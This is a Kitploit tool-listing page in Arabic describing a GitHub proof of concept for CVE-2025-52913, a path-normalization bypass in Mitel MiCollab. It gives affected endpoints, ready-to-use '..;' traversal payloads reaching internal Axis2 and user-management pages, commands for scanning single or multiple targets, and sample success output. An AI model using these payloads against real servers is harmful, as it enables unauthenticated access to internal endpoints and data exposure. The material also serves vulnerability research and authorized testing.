Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
PoC-CVE-2025-52913 — إثبات مفهوم (PoC) لثغرة CVE-2025-52913، وهي ثغرة في تطبيع المسارات تؤثر على Mitel MiCollab. | Kitploit
أدوات/GitHubGitHub/pgasus99/poc-cve-2025-52913
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراقالتعلم والتعليم
GitHubpgasus99/poc-cve-2025-52913

PoC-CVE-2025-52913

إثبات مفهوم (PoC) لثغرة CVE-2025-52913، وهي ثغرة في تطبيع المسارات تؤثر على Mitel MiCollab.

عرض المستودع
منذ 4 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-52913 - ثغرة تطبيع المسار في MiCollab

📌 نظرة عامة

يحتوي هذا المستودع على إثبات للمفهوم (PoC) لثغرة CVE-2025-52913، وهي ثغرة في تطبيع المسار تؤثر على Mitel MiCollab.

تسمح المشكلة للمهاجمين غير المصادق عليهم بتجاوز قيود المسار المقصودة من خلال استغلال تسلسلات URL مصممة بعناية مثل ..;، مما يؤدي إلى الوصول إلى نقاط نهاية تطبيقات داخلية.


⚠️ التأثير

قد يسمح الاستغلال الناجح بما يلي:

  • الوصول إلى نقاط النهاية الداخلية والمقيدة
  • كشف مكونات تطبيق حساسة
  • احتمال كشف المعلومات

🎯 نقاط النهاية المتأثرة

يمكن تشغيل الثغرة عبر المسارات التالية:

root@kitploit:~
/npm-pwg/loginForm.jsp/
/npm-pwg/extendedUmPlayMessage.jsp/
/npm-admin/showLoginPage.do/
/npm-admin/login.do/

💣 الحمولات

أمثلة على حمولات العبور (traversal):

root@kitploit:~
/..;/..;/axis2-AWC/axis2-web/HappyAxis.jsp
/..;/..;/usp/searchUsers.do

🚀 الاستخدام

1. تثبيت التبعيات

root@kitploit:~
pip install -r requirements.txt

2. التشغيل ضد هدف واحد

root@kitploit:~
python3 POC-CVE-2025-52913.py example.com

3. التشغيل ضد أهداف متعددة

root@kitploit:~
python3 POC-CVE-2025-52913.py domains.txt

🧪 مثال

root@kitploit:~
[*] Testing http://example.com
[+] http://example.com/npm-pwg/loginForm.jsp/..;/..;/axis2-AWC/axis2-web/HappyAxis.jsp - 200
    [!] Possible success

🔍 الاكتشاف

من المرجح أن يكون الهدف عرضة للثغرة إذا:

  • استجاب الخادم برمز HTTP 200

  • احتوت الاستجابة على:

    • Axis2
    • Axis2 Happiness Page
    • مخرجات تطبيق صالحة من نقاط النهاية الداخلية

🛠️ التفاصيل الفنية

تنشأ الثغرة من التطبيع غير السليم للمسارات المصممة بعناية التي تحتوي على ..;، مما يسمح بتجاوز سياق التطبيق المقصود.

يمكن أن يؤدي هذا السلوك إلى كشف خدمات داخلية مثل:

  • واجهة خدمات ويب Axis2
  • نقاط نهاية إدارة المستخدمين الداخلية

👤 الاكتشاف

اكتُشف بواسطة Dahmani Toumi


📚 المراجع

  • CVE: CVE-2025-52913
  • (أضف نشرة البائع أو رابط NVD عند توفره)

⚖️ إخلاء المسؤولية

هذا المشروع مخصص للأغراض التعليمية واختبار الأمان المصرح به فقط.

لا تستخدم هذه الأداة ضد الأنظمة دون إذن صريح. المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر.


تنزيل الأداة